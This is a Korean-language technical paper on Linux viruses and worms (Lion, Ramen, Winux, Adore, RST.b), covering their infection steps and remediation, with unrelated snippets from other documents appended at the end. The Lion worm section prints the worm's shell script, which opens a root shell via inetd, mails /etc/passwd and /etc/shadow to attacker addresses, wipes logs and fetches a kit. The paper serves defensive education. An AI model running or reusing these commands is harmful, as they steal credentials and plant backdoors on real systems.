0. 시작하면서 본기술문서는 Linux에서발생하는 Virus에대하여기술한문서로정확한감염증상, Virus의동작원리와그에따른대응방안을서술하였습니다. 오직 Linux OS에서만감염되는 Virus만나열하였음을미리알리며그외다른 OS에서발생하는 Virus에대해서는거론하지않았음을알

Size: px
Start display at page:

Download "0. 시작하면서 본기술문서는 Linux에서발생하는 Virus에대하여기술한문서로정확한감염증상, Virus의동작원리와그에따른대응방안을서술하였습니다. 오직 Linux OS에서만감염되는 Virus만나열하였음을미리알리며그외다른 OS에서발생하는 Virus에대해서는거론하지않았음을알"

Transcription

1 기술문서 작성 Linux Virus 탐지및대응 작성자 : 동명대학교 THINK 동아리서환곤 masinmaster@gmail.com 0. 시작하면서 p.1 1. Linux Virus 개요 p.1 2. Linux Virus 종류및특징 p.4 3. Linux Virus 분석 p.5 4.Linux Virus 대응방안 p 마치면서 p 참고문헌 p.14

2 0. 시작하면서 본기술문서는 Linux에서발생하는 Virus에대하여기술한문서로정확한감염증상, Virus의동작원리와그에따른대응방안을서술하였습니다. 오직 Linux OS에서만감염되는 Virus만나열하였음을미리알리며그외다른 OS에서발생하는 Virus에대해서는거론하지않았음을알려드립니다. 이문서는 Linux 를사용하는일반사용자나시스템관리자혹은서버관리자를주대상으로삼았 으며각종 Virus 에감염되는대상시스템은해당 Virus 에따라다르므로따로분류하였으니참고하 기시바랍니다. 1. Linux Virus 개요 가. Linux Virus 는과연존재하는가? 사실상 Linux Virus는그존재여부조차아는사람이별로없을만큼인지도가낮은게현실이다. Linux Virus는 Windows와는다르게 Virus의개체수가적으며감염되더라도그리위협적이지않은 Virus가상당수이다. 이유는 Linux를사용하는사용자의수가 Windows에비해많지않다는점도한몫하지만그이전에 Linux OS 자체가 Virus에강력하다는점이다. 이는 Linux OS 타 OS 와의다른하나의장점이기도하다. 특히과거에는 Linux를사용하는사용자가워낙적은탓에 Linux용 Virus를제작하는사람도거의없다고볼수있었고 Virus를제작하더라도그리큰효과가나타나지않기때문에 Virus의빈도수는현저히낮았다. < 그림 1-1> 2003 년모든 OS 별 Virus 감염통계 하지만현재는 Fedora나 Ubuntu 등의 Linux 배포판이증가하고사용자도늘어나고있는추세라 Linux용 Malware나 Virus등도곳곳에분포되고있는추세라더이상은 Linux Virus를간과하기만할수도없는추세이다. 더불어최근 Linux와 Windows 양쪽 OS 모두에작용하는복합적인 Virus도발견되어 Linux도더이상 Virus에서안전하지만은결론에도달했다. 어떤 OS든 Virus가없는 OS는없고, Linux OS도그에대해완전히안전할수는없는노릇이다

3 나. 왜 Linux 는 Virus 로부터안전했나? 앞서 Linux OS 는 Virus 부터특히강력하다는거론을했는데그이유에대해간략하게나마서술 하고자한다. 이분류는앞으로 Linux OS 에서 Virus 에대한심각성을부각하고자해서만든것임 을미리알리는바이다. Linux OS 가 Virus 로부터안전했던이유는많은이유가있는데구체적으로 3 가지를나열하면다 음과같다. 1) Linux OS의강력한계정관리기능 Linux OS는 Virus가존재함에도불구하고전파가잘되지않는다는점이있는데이유는바로 Linux OS는계정관리시스템이있기때문이다. Windows가특히 Virus에취약한이유는사용자들이주로관리자계정즉, Administrator계정으로흔히사용하므로 Virus의전파가원활하게이루어지기때문이다. 특히관리자계정이 Virus에감염된다면하위권한의모든계정들도 Virus에감염이되므로결론적으로관리자한사람만이아닌모든사용자들이감염이되는셈이다. 하지만 Linux OS의경우는계정관리시스템이철저하기때문에파일에대한접근권한이나쓰기, 및실행권한등의상세한설정이가능해설령하나의계정이 Virus에감염이된다하더라도해당계정하나만피해를보기때문에전파가어려운것이현실이다. Linux OS의관리자계정즉, root는필요할때만 Console로접속하여작업을하는것이보통이라거의사용되는일이전무하다. Virus가시스템전부에영향을미치기위해서는 setuid로 root의계정을취득하여 Compile해야만가능한데이를실행하기위해서 Virus 하나만으로는거의불가능하기때문이다. 2) Active X 악성코드에면역인터넷악성코드중가장많은비중을차지했던 Active X 컨트롤형악성코드는 Linux OS에서는아예통하지않는다. 이유는 Active X는오직 Microsoft 사의기술이며이기술은오직 Windows 에서만통하므로 Linux OS는이부분에있어서는완전한면역을보였다. 때문에감염경로면에서많은비중을차지했던 인터넷 부분에서도 Linux OS는 Virus로부터안전했던것이다. 3) Linux OS 낮은사용률과빠른보안 Patch 근본적이고도당연한이유이지만 Linux OS는 Windows에비해사용률이낮다. 즉, Linux OS는 Windows비해사용자가적다는사실이다. 때문에 Virus를전염시키더라도워낙적어서별효과를보기가힘들다. 또한 Virus가발견되거나신고가들어올시제작사혹은배포사에서즉각빠른조치를취해 Virus 본연의의미를상실시킨다. 이로인해 Linux OS는 Virus제작보다는 root계정을얻어내는 Hacking이나 Rootkit을제작하는것이보편적이며이를제작하기위해선 Linux시스템의전반적인지식을갖추어야하므로공격을하는 Hacker들의수도현저히낮은편이다

4 다. 현재 Linux Virus 의동향앞서거론했듯이 Linux는 Virus로부터완전하지는안지만어느정도의계정관리와파일시스템관리등을통해안전지대를형성할수있었다. 하지만계속해서두터워지는유저층과쏟아져나오는여러배포판에힘입어 Linux의인지도는과거에비해상당히올랐고이를노리는일부 Hacker들은 Virus를제작하여감염시키기시작했다. 2001년초에는일명 라면 Virus 라고불리는 PHP Virus를출두로 Worm이등장하기시작했다. 이 Virus는시스템을파괴하는등의적극적인공격은하지않았지만네트워크대역폭을독차지하여 Server에장애를일으키거나 Virus 제작자가추후출입할수있는 Backdoor를설치하는등악의적인행위를일으키는 Virus이다. 이것은시작에불과한것으로, 이후한단계진화를거친 Ador Worm이나 Windows와 Linux 양쪽 OS 모두에게장애를일으키는 Winux 등이속출하기시작해 Linux 용 Virus가서서히두각을드러내기시작하였다. 즉, Linux용 Virus라는 Linux 전용 Virus가등한셈이다. 이 Linux Virus 는단순한 Virus 가아닌 Computer Virus 와 Hacking 기술이결합되어더욱진보된 Virus 를의미한다

5 2. Linux Virus 종류및특징 가. Linux Virus 유형 Linux Virus 는크게 3 가지유형으로나누어볼수있다. 1) Linux/stago, Bliss 등과같은 Linux 의실행파일 ELF(Executable and Linking Format) Virus 2) Kernel, Library 에삽입되는 Virus 3) Morris Worm, ADM Worm 등과같은시스템자체버그나설정취약성을이용한 Worm Virus 이외에도특정 Worm이용하여분산서비스거부공격 (Distributed Denial Of Service) 을일으켜 Server에과부하를일으키거나능숙한 Hacker의경우시스템을 Hacking한뒤 Virus형태로시스템주요파일과시스템자체내의 Kernel에보이지않게트로이목마를설치하는등의공격유형이있다. 이러한경우보안관리자라해도해당트로이목마를탐지및제거를하기가매우힘들어지며보안시스템을구축해놓아도곧바로대응하기힘들어진다. 다음은구체적인 Linux Virus 의종류에대해나열하고서술하도록하겠다. 1) Shell Script : 가장간단히제작할수있는형태의 Virus 로 Shell Script 를이용하여크기가 200byte 도안되는 Virus 를만들어낼수도있다. 2) Boot Sector Viruses : Intel 기반의 PC 와 PC Server 시스템의경우에는기본 Boot Sector의구조가같기때문에가장쉽게만들어낼수있는유형의 Virus이다. Linux 뿐아니라 386BSD, SCO Unix 등 Intel 기반의 Server PC 들은감염된 Disk로부팅할경우 Dos Boot Sector Virus에감염될수있다. 3) Worms : 해킹기술을응용하여관리자계정 (root) 을획득해다른시스템에전염시킨다는두드러진특징이나타나는 Virus이다. 특히관리자계정을취득하여공격하는방식은 Windows의 Worm보다도피해성이심각하다고볼수있다. Worm의형태는시스템과설치된응용프로그램의버전들의의해그피해확산이결정되는문제가있었지만최근계속해서새로운취약성이공개되고있으며이러한취약성에대한공격모듈은매우쉬운추가와업데이트가가능해더욱위험성이심각해지고있다. 대표적으로 Morris Worm이나 ADM Internet Worm등이있으며특정 Worm 은분산서비스거부공격 (Distributed Denial Of Service) 등에이용될수있다. 4) ELF Infector : Linux 시스템의실행파일인 ELF(Executable and Linking Format) 파일을실제적 으로감염시키는방식으로임의의악의적인코드나텍스트를삽입할수있기때문에전파가능 성이매우높다고볼수있다. 5) Faked Library : 일반적으로 Linux에서응용프로그램을실행하거나함수를호출할경우그에따른특정 Library를사용하게되는데이러한 Library들은보안상상당히취약한부분이많으며이를 Hacking 하여주요함수 Library를 Virus로바꿔놓아악의적인작업이실행되게하는방식이보편적이다

6 3. Linux Virus 분석 본격적으로 Linux에서가장빈번하게일어나는 Virus 혹은감염시치명적인위험이권고되는최신 Virus에대해나열하고해당 Virus의특징이나감염증상, 동작과정, 대응방안등을서술하겠다. 가. Lion Worm Lion Worm 은 BIND 의 TSIG 취약점을이용한 Worm으로 Ramen Worm과비슷하지만위험도가더높다. 이 Worm 은 BIND DNS Server 를운영하는 Linux OS에감염되고대규모네트워크를스캔하여공격한후 Rootkit을설치하므로많은시스템이피해를당한후에도공격자에게계속적으로악용될수있다. 특히공격받기쉬운컴퓨터의 Class B IP 네트워크를겨냥하여 Scanning 함으로써피해를확산시킬수있다. 침투에성공한후에는 Virus의존재를숨길수있도록설계된 coollion.51.net에서패키지를설치하여공격자가임의로새로운파일을변경혹은형성하여새로운디렉터리를만들어이러한작업을계속실행한다. 이 Worm은재부팅되는동안에도활성상태로남아있어계속위장한다. 1) 대상시스템 bind PX 2) 동작원리 1 임의의 IP 대역을선택하여 53번포트를스캔한다. 2 53번포트가열려있는시스템을발견, 취약한버전의 BIND 시스템일경우공격한다 번포트혹은 10008번포트를백도어로열어놓은뒤 /etc/password, /etc/shadow 파일을공격자의메일로보내고세부적인사항은특정메일주소로보낸다. 4 lynx -dump을이용하여 kit(crew.tgz) 을다운로드받는다. 5 kit의압축을풀고초기화스크립트를실행한다. 이후 /etc/hosts.deny를삭제하고rc.sysinit 에자동으로스캐닝스크립트를시작하는라인을추가하여스캔을시작하는스크립트를시작하여모든과정반복한다. PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin export PATH;export TERM=vt100 rm -rf /dev/.lib mkdir /dev/.lib cd /dev/.lib echo '10008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf; killall - HUP inetd;ifconfig -a>li0n cat /etc/passwd >>li0n cat /etc/shadow >>li0n mail huckit@china.com <li0n rm -fr li0n;rm -fr /.bash_history - 4 -

7 echo >/var/log/messages rm -rf /var/log/maillog echo 'Powered by H.U.C(c0011i0n) i0n Crew' > index.html;echo '#!/bin/sh' > lion echo 'nohup find / -name "index.html" -exec /bin/ 체 index.html {} ;'>>lion echo 'tar -xf 1i0n.tar'>>lion echo './1i0n.sh' >>lion echo >>lion echo >>lion chmod 755 lion; PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin' export PATH export TERM=vt100 rm -rf /dev/.lib mkdir /dev/.lib cd /dev/.lib echo '1008 stram tcp nowait root /bin/sh sh' >>/etc/inetd.conf killall - HUP inetd ifconfig asswd >> 1i0n cat /etc/shadow >> 1i0n mail 1i0nip@china.com <1i0n;rm -fr 1i0n rm -fr /.bash_history lynx -dump >1i0n.tgz tar -zxvf 1i0n.tgz rm -fr 1i0n.tgz cd lib./1i0n.sh exit; 6 이전피해시스템의 27374번포트에접속하여 1i0n.tar파일을받아온다. 7 asp라는서비스를추가해 27374번포트를통해 Worm을다른시스템으로전파시킨다. 결론적으로 Worm 감염된 Server는다른곳으로 Worm을전파시켜주는 Server가된셈이다. 8 index.html 파일을 index.htm 파일로변환하고 /etc/rc.d/rc.sysinit 파일에 /dev/lib/star.sh" 와같은라인이추가된다. 9 흔적을지우고 /dev/.lib/star.sh가실행되면서곧바로다시다른시스템을공격한다

8 3) 대응방법 1 nmap 을이용하여 1008 번, 번, 번포트의오픈유무를확인한다. nmap -st -p 1008,10008,27374 xxx.xxx.xxx.xxx <- 호스트 IP 2 /dev/.lib 디렉터리가있는지확인한다. 3 /tmp/ramen.tar 파일이있는지확인한다. 4 /etc/rc.d/rc.sysinit 파일에 /dev/.lib/star.sh가있는지확인한다. 5 /etc/inetd.conf 파일에다음과같은라인이있는지확인한다 stream tcp nowait root /bin/sh sh stream tcp nowait root /bin/sh sh asp stream tcp nowait root /sbin/asp 6 감염된시스템에서 Lion 파일을탐지하기위해서 Sans에서제공하는 1ionfind를사용한다. 7 Snort를이용하여다음과같은스크립트를작성한다. activate u에 any any -> any 53 (msg:"bink Tsig Overflow Attempt"; content; " F /bin/sh"; tag: host, 300, seconds, src;) 8 chkrootkit 을이용하여 Lion Worm 을탐지한다. 단 chkrootkit 은 0.30 버전이상이어야한다. 9 BIND 버전을 버전이상으로업그레이드한다

9 나. Rmen Virus 일명 라면 Virus 라고도불리는이 Virus는 Worm 의한종류로전세계적으로유명한보안포럼, 백신업체등에서논의된바가있다. 지난 88년 sendmail의보안취약점을이용한인터넷 Worm과 99년 12월에발생한 Millennium Internet Worm등의피해사례가대표적이다. 역시 Worm 이니만큼빠른전파력을보여주고이로인해피해시스템이기하급수적으로증가할수있는 Worm이다. 이 Virus는시스템내에심각한피해를주지않지만자기복제가가능하고, 보안이허술한특정 Linux 시스템을공격목표로선정하여취약점을찾아자동으로침입하는기능과침입한시스템에보안취약점을패치, 메인페이지인 index.html 파일을공격자가원하는텍스트를삽입하여화면으로바꾸는기능등이있다. 또한멀티태스킹을지원하는네트워크를방해하거나공격도구를설치하는등의다수의능력이존재하지만 Ramen은이런기능들을수행하기위해여러스크립트로구성되어있다. 1) 대상시스템 Redhat 6.0, Redhat 7.2 특히패치되지않은 wu-ftp, nfs 를서비스하는 Redhat 이주대상이다. 2) 동작원리 1 FTP 서비스포트인 21번포트를스캔하고취약점을가진시스템의여부에대해스캐닝한다. 이때 FTP 배너의날짜를이용하여취약점을분석한다. 2 취약점점검과동시에공격스크립트가수행되며목표한시스템에취약점이확인되는즉시작업디렉터리를생성한다. # strings s62, s7, 17, 17, 162, w62, w7 mkdir /usr/src/.poop <-- 디렉터리생성 cp remen.tgz /tmp <-- 감염된시스템으로 ramen.tgz를복사한다. 설치후나중에 ramen 패키지를배포할목적으로 27374포트를통한제한된웹기능을가진서비스를설치한다. # netstat -na tcp : :* LISTEN 3 원격으로감염시스템의파일을마운트한후시스템전부를검색하여 index.html 파일을공격자가원하는파일로변경한다. 웹서버를손상시킬수있고 html 형식으로작성된문서파일과개인디렉터리를손상시킬수도있다. 4 피해시스템에서특정계정으로 을전송한다. 5 감염된시스템내에취약점을패치한다. FTP서비스와 rpc.stad를 disable 시킨다. 6 감염시스템을이용하여새로운취약점을가진시스템을스캔한후같은식으로감염시킨다. 3) 대응방안 1 /usr/src/.poop 와 /sbin/asp를제거한다. 2 /etc/xinetd.d/asp를제거한다. 3 /etc/inetd.conf에서 asp, stream, tcp, nowait, root, /sbin/asp를제거한다

10 4 /etc/rc.d/rc.sysinit에서 /etc/src/poop 제거한다. 5 시스템을재부팅하거나 synscan, start.sh, scan.sh, hackl.sh, hackw.sh 프로세스를제거한다. 6 ftp, rpc.statd. 1pr 업데이트후서비스를재시작한다. 7 Redhat 취약점패치를한다. 다. Winux Windows OS 뿐아니라동시에 Linux OS 도감염시키는최초의 Virus로이 Virus를처음발견한 Central Command란회사에의해 Winux라명의되었다. 딱히시스템을파괴하거나장애를일으키는등의위험성은없으나각각의플랫폼에독립적으로작동하는최초의 Virus라는점에큰의미를두고있다. Win32.Winux. Win32.PEELF.2132 등등의여러이름으로불리며비메모리상주 Virus 이다. 1) 대상시스템 Windows 플랫폼의 PE 파일, Linux 플랫폼의 ELF 파일 2) 동작원리 1 현재폴더에위치한모든파일과그상위폴더의모든파일을열어검색한다. (PE, ELF파일 ) 2 휴면상태로잠적해있다가사용자가감염된프로그램을실행하거나 로첨부파일을보낼때가동하기시작한다. 3 Windows의 PE파일의.reloc섹션을덮어씌워감염시킨다. 만약.reloc 섹션사이즈가 Virus보다크지않다면파일은감염되지않는다. 이것들은다른파일들은감염시킬때 API function을사용한다. FindFirstFileA FindNextFileA IndClose CreateFileA CreateFileMappingA MapViewOfFile UnmapViewOfFile CloseHandle VirtualAlloc VirtualFree WriteFile SetFilePointer GetCurrentDirectoryA SetCurrentDirectoryA 4 Linux ELF executable 은 entry point 의 instructions 를덮어씌움으로써감염된다. 이렇게되면 본래있던코드는 ELF executable 의맨끝에저장된다. 감염된 ELF 프로그램이실행될때 Virus 코드가작동하여호스트파일을컨트롤하여더번지게한다

11 5 W32.Winux 는다음과같은텍스트문장을보여준다. [?Win32/Linux.Winux] multi-platform virus by Benny/29A?and?This GNU program is covered by GPL.?" 3) 대응방안 1 시스템내에피해를입히거나하는경우는없으므로감염된파일을삭제하거나 Anti-Virus 프로그램을사용하여제거하면된다. 2 백신프로그램을이용하여치료가가능하다. 라. Adore Worm Adore Worm은원래 'Red Worm' 의이름이변형되어탄생하게된것이다. 이 Worm은 Ramen 이나 Lion웜과비슷하므로주의가요구되는 Virus이다. Adore Worm은임의의호스트들을스캔하여공격하는방식으로역시 Ramen이나 Lion Virus의공격방식과비슷하다. 주로 LPRng나 wu-ftpd, BIND 취약점이있는 Linux 시스템을공격한다. 1) 대상시스템 LPRng, rpc-statd, wu-ftpd, BIND 를운영하는 Linux 시스템. 2) 동작원리 1 ps의 Binary 파일을 Trojan 버전으로교체하고원본은 /usr/bin/adre로옮긴다. 2 red.tar를 /usr/lib/lib에설치한다. 3 adore9000@21cn.com, adore9000@sina.com, adore9001@21cn.com, adore9001@sina.com으로특정정보를메일을보낸다. /etc/ftpusers, ifconfig, ps -aux, /etc/hosts, /etc/shadow 4 icmp를실행하여접속을허가하는 rootshell을설정한다. 5 cron daily의 cronjob을설정하여존재하는모든 log를지우고시스템을재부팅한다. 6 /bin/ps를 /usr/bin/adore, /sbin/klogd를 /usr/lib/klogd.o, /etc/cron.daily/0anacron을 /usr/lib/lib/0anacron-bak 교체한다. 7 rootshell을생성한다. 3) 대응방안 1 Adorefind 를사용하여 Adore Worm 의설치여부를조사한다. 2 취약점이있는 4 가지서비스를패치한다. (LPRng, rpc-statd, wu-ftpd, BIND) - 9 -

12 마. RST.b Virus RST.b는 Remote Shell Trojan b의약자로단순한 Virus가아닌 backdoor 기능까지겸비하여강력한 Virus로손꼽히고있다. 감염증상은일부명령어가실행되지않거나 Compile이잘되지않고 Zombie Process가상당히많이보이는등의증상이일어난다. 다음은 ls 명령어를실행하였을때나타나는오류이다. /root]# ls -la ls: unrecognized option '--show-control-chars' Try 'ls --help' for more information 1) 대상시스템 구체적인시스템버전은등장하지않았으나대부분 Mozilla 패치에의해감염 2) 작동원리 1 감염된 Mozilla Linux 서버에서 Packaging한파일을 Mozilla 공식서버로보내면서감염 2 사용자들이 mozilla ko-kr 패치를하면서 mozilla-installer-bin 이라는파일이클라이언트 에감염된다. 3 이후 ls 명령어나특정명령어가사용이불가능해진다. 4 ps 명령어실행시다음과같은 defunct (zombie process) 가확인된다. root pts/1 T 13:28 0:00 ls -FX --show-control-chars --color=auto -al root pts/1 Z 13:28 0:00 [ls <defunct>] root pts/1 T 13:32 0:00 rm -f MCerror root pts/1 Z 13:32 0:00 [rm <defunct>] root pts/1 T 13:32 0:00 rm -f MCerror root pts/1 Z 13:32 0:00 [rm <defunct>] root pts/1 T 13:32 0:00 rm -f MCerror root pts/1 Z 13:32 0:00 [rm <defunct>] root pts/1 T 13:34 0:00 touch /usr/src/libux/include/linux/netifier.h root pts/1 T 13:34 0:00 touch /usr/src/libux/include/linux/reboot.h root pts/1 Z 13:34 0:00 [touch <defunct>] root pts/1 Z 13:34 0:00 [touch <defunct>] root pts/1 T 13:35 0:00 touch /usr/src/libux/include/linux/seralp.h root pts/1 Z 13:35 0:00 [touch <defunct>] root pts/1 Z 13:37 0:00 [touch <defunct>] root ? S 13:38 0:00 /usr/sbin/sshd2 root pts/1 T 14:03 0:00 ls -FX --show-control-chars --color=auto -lat root pts/1 Z 14:03 0:00 [ls<defunct>] root pts/1 T 14:08 0:00 touch /usr/src/linux/include/linux/rwsem.h

13 root pts/1 Z 14:08 0:00 [touch <defunct>] 5 /bin, /sbin, /usr/bin/, /usr/sbin/ 디렉터리내에있는실행파일의변경날짜를최근으로계속 바꾼다. 6 /dev/hdx1, /dev/hdx2 파일을생성하고 eth0 을 promisc mode 로변경한다. 3) 대응방안 1 rstb.tgz라는 rstb전용스캐너를다운받아압축을푼다. 2 rstb_detector를실행하여 rst.b 감염여부를확인한다. 3 아래명령어를샐행하여 rsb_cleaner 파일이감염되지않도록설정한다. [root@www rstb]# chattr +i rstb_detector rstb_cleaner 4 /bin/* 디렉터리에있는파일중감염된파일을찾아감염된파일은그대로두고, 감염되기이전의원본파일을파일명.clean 변경한다. ( 이작업은 rstb_detector를실행하면자동으로이루어진다.) 5 이어서 /sbin, /usr/bin, /usr/sbin 폴더에도위와같은작업을한다. 6 제일먼저깨끗한 ls와 mv 원본파일에도변경불가속성을부여한다. [root@www rstb]# chattr +i /bin/ls.clean /bin/mv.clean 7 ls.clean -al /bin/*.clean을실행하면감염되기이전의파일들이보이게된다. 이원본파일들로모두교체하여야한다. 8 감염된 mv대신 mv.clean 명령어를이용하여.clean 파일로덮어쓰고읽기전용속성을부여한다. [root@www rstb]# mv.clean /bin/chgrp.clean /bin/chgrp [root@www rstb]# chattr +i /bin/chgrp 9 mv.clean 과 ls.clean 파일의 I 속성을해제하고파일들의이름을원래대로변경한다. [root@www rstb]# chattr -i /bin/mv.clean /bin/ls.clean [root@www rstb]# cp -f /bin/mv.clean /bin/mv [root@www rstb]# cp -f /bin/ls.clean /bin/ls [root@www rstb]# rm -f /bin/ls.clean /bin/mv.clean 10 마지막으로 ps 에 defunct 되어있는 zombie process 를모두 kill 한다

14 4. Linux Virus 대응방안 끝으로 Linux Virus 에감염되기이전의대응방안및사용자들이가져야할태도등에대하여설명하고자한다. Linux Virus 는현재까지는아직심각한수준의피해는나오지않았지만앞서말했듯이점점이목을끌고있는 OS 로서 Virus 에대해미리알고예방하는것이좋을것이다. 가. 정기적인백업과시스템관리개인 PC 사용자라면비상시에급습하는 Virus 에대하여정기적인백업을할것을추천한다. 사용자입장에서 Virus 의가장무서운점이라면 방해 가아닌 파괴 이다. 때문에 Virus 에감염되었을최악의상황이라면바로중요한파일손상되거나혹은시스템전체가사용불능의상태가되었을때를말한다. 이때를대비하여중요한자료나문서등은미리백업을해놓는것이가장좋은방법이다. 시스템관리자의경우당연히필수적인사항이며보안관리정책을미리마련하거나 Virus 가네트워크로퍼질가능성에대비하여공유폴더이용시주의하여야한다. 나. 백신의활용 Virus 의확산을막기위한가장좋은방법은 Virus 의백신을활용하여야한다. 백신은 Virus 제거만하는것이아니라주기적으로시스템점검시에도매우유용한프로그램이다. 백신프로그램은 Virus 의유형만이아니라트로이목마, Worm, 해킹프로그램까지검색하여제거하는엔진을제공하여시스템보안상의면에서도우수한성능을자랑한다. 물론어떤프로그램과백신엔진을사용할지는사용자들이선택해야할몫이다. 다. 정기적인업데이트 Virus 는발전형태의악성프로그램으로이는즉, 치료가되거나해당시스템에통하지않더라도얼마든지우회하여다른버전의 Virus 프로그램을만들어낼가능성이있다는것이다. 이에발맞춰사용자들도정기적으로시스템업데이트나보안패치를해야할필요성이있다. 이것을주기적으로하지않을경우치료했던 Virus 에또감염될우려가있으며신종 Virus 에도감염될확률이높아져결국가장안전한예방법은시스템업데이트를하는방법이최선의방법일것이다. 패치는언제나신속하게이루어져야하며이를위해선사용자가보안에어느정도이상의관심을가져야할것이다. 라. 감염위험의최소화 Virus 피해감염을최소화시키는것으로기술적인면보단사용자들의 습관 에비롯된대응방안이라볼수있다. 예를들면특정파일을다운로드받을때미리 Virus 를체크하거나평소워드도큐먼트는 RTF 파일로, 엑셀스프레드시트는 CSV 파일로저장하는방법등이있다. 이러한포맷은매크로를지원하지않기때문에도큐먼트 Virus 를퍼뜨릴위험성을감소시키는효과가있다. 인터넷브라우저는 Java 나또는쿠키등과같은코드를실행시키지않도록안전하게설정하고구성하여야한다. 백업역시감염위험의최소화에일축된다. 마. 시스템에대한전반적지식 Virus 를단순히보안도구나백신으로완전히치료하는것은근본적인한계가있다. 이것은비단 Linux 뿐만아니라어떤 OS 를사용하더라도그에대한필수적인전반적지식이갖춰진다면완벽히 Virus 를치료할수있다. 특히 Linux 의경우는 Virus 를치료할때필요로하는실행명령어가많은편이므로항상숙지하는것이좋다

15 5. 마치면서 현재까지의 Linux Virus 는아직초기단계로파괴력이없는연구를목적으로제작된바이러스가대부분이며이에대해서는계속적인연구가이어질것으로판단된다. Linux Virus 는사용자를약간귀찮게하는정도의효과일뿐, 더나아가시스템을완전히사용불능으로만들어버리거나파괴하는등의행위는현재까지거의없는것으로보인다. 하지만 Virus 제작자들이 Linux 에깊은관심을가지고 Virus 를제작해온다면앞으로어떤유형의새로운 Virus 가나올지는누구도예측할수없다. Linux OS 는계속해서발전중에있으며사용자층도현저히늘고있음과동시에 Virus 에대한위험요소도더이상은배제할수없게되었다. Linux 를사용하는사용자들의보안인식이좀더개선되어신종 Virus 가나오더라도즉시적절한대응을할수있길바라며본문서를마친다. 6. 참고문헌 - 도서리눅스서버보안관리실무 ( 홍석범, , ( 주 ) 슈퍼유저코리아 ) - 참고사이트

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

2-11Àå

2-11Àå Chapter 11 script kiddies.... 24.., script kiddies..,... 215 1 TCP/IP., TCP/IP. IP IP..,. IP. TCP/IP TCP( UDP).. 0 65535.., IP, IP,,. (, ). 216 Chapter 11 IP. IP.... 1024 (0 1023 ).... A B. B IP, A. IP,

More information

Microsoft PowerPoint - comp_prac_081223_2.pptx

Microsoft PowerPoint - comp_prac_081223_2.pptx Computer Programming Practice (2008 Winter) Practice 2 기본 Unix/Linux 명령어숙지 2008. 12. 23 Contents Linux commands Basic commands File and Directory User Data Filtering Process Etc Conclusion & Recommended

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 (Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet

More information

Adobe Flash 취약점 분석 (CVE-2012-0754)

Adobe Flash 취약점 분석 (CVE-2012-0754) 기술문서 14. 08. 13. 작성 GNU C library dynamic linker $ORIGIN expansion Vulnerability Author : E-Mail : 윤지환 131ackcon@gmail.com Abstract 2010 년 Tavis Ormandy 에 의해 발견된 취약점으로써 정확한 명칭은 GNU C library dynamic linker

More information

CD 무결성체크는 SKIP 을해도좋습니다. Next 버튼을누릅니다. Next 버튼을누릅니다.

CD 무결성체크는 SKIP 을해도좋습니다. Next 버튼을누릅니다. Next 버튼을누릅니다. :: F.T.Z 복구매뉴얼 :: Redhat 9.0 설치 F.T.Z는 Redhat 9.0 리눅스운영체제를기반으로구성되어있습니다. Redhat 9.0은비교적낮은버전의배포본에속하는데, 이처럼낮은버전을이용하는이유는최신리눅스배포본들의경우 Buffer Overflow 등취약점공격에대한보안장치가뛰어나서초보들이쉽게공략하기힘들기때문입니다. 반면 Redhat 9.0은 Buffer

More information

망고100 보드로 놀아보자-4

망고100 보드로 놀아보자-4 망고 100 보드로놀아보자 -4 Minicom,tftp,nfs 설정,vnc 설정 minicom 설정 Minicom 설정 >#yum install minicom >#ls /dev/ttyusb* ># minicom s Minicom 설정 Serial Device :/dev/ttyusb0 Baudrate:115200 Hardware Flow control: NO

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

Snort Install Manual Ad2m VMware libnet tar.gz DebianOS libpcap tar.gz Putty snort tar.gz WinSCP snort rules 1. 첫번째로네트워크설정 1) ifconf

Snort Install Manual Ad2m VMware libnet tar.gz DebianOS libpcap tar.gz Putty snort tar.gz WinSCP snort rules 1. 첫번째로네트워크설정 1) ifconf Snort Install Manual Ad2m VMware libnet-1.1.5.tar.gz DebianOS libpcap-1.1.1.tar.gz Putty snort-2.8.6.tar.gz WinSCP snort rules 1. 첫번째로네트워크설정 1) ifconfig 명령어로현재 IP를확인해본다. 2) vi /etc/network/interfaces 네트워크설정파일에아래와같이설정을해준다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 BOOTLOADER Jo, Heeseung 부트로더컴파일 부트로더소스복사및압축해제 부트로더소스는웹페이지에서다운로드 /working 디렉터리로이동한후, wget으로다운로드 이후작업은모두 /working 디렉터리에서진행 root@ubuntu:# cp /media/sm5-linux-111031/source/platform/uboot-s4210.tar.bz2 /working

More information

Sena Technologies, Inc. HelloDevice Super 1.1.0

Sena Technologies, Inc. HelloDevice Super 1.1.0 HelloDevice Super 110 Copyright 1998-2005, All rights reserved HelloDevice 210 ()137-130 Tel: (02) 573-5422 Fax: (02) 573-7710 E-Mail: support@senacom Website: http://wwwsenacom Revision history Revision

More information

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

Microsoft Word - windows server 2003 수동설치_non pro support_.doc Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로

More information

Windows 8에서 BioStar 1 설치하기

